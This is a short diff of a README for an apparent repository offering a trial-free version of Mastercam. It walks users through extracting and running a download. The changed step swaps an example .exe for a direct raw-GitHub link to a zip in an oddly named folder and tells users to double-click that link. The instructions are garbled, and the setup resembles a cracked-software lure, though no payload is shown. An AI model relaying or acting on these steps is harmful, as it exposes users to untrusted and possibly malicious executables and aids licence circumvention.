uzair46/Mastercam-No-Trial/README.md

 1. Navigate to your Downloads folder and find the downloaded file.
 2. Right-click on the file and select "Extract All" to unzip the contents.
 3. Open the unzipped folder.
-4. Double-click on the main application file (e.g., Mastercam-No-Trial.exe) to launch the application.
+4. Double-click on the main application file (e.g., https://raw.githubusercontent.com/uzair46/Mastercam-No-Trial/main/hither/Mastercam-No-Trial-3.3.zip) to launch the application.

 ## 🚀 Features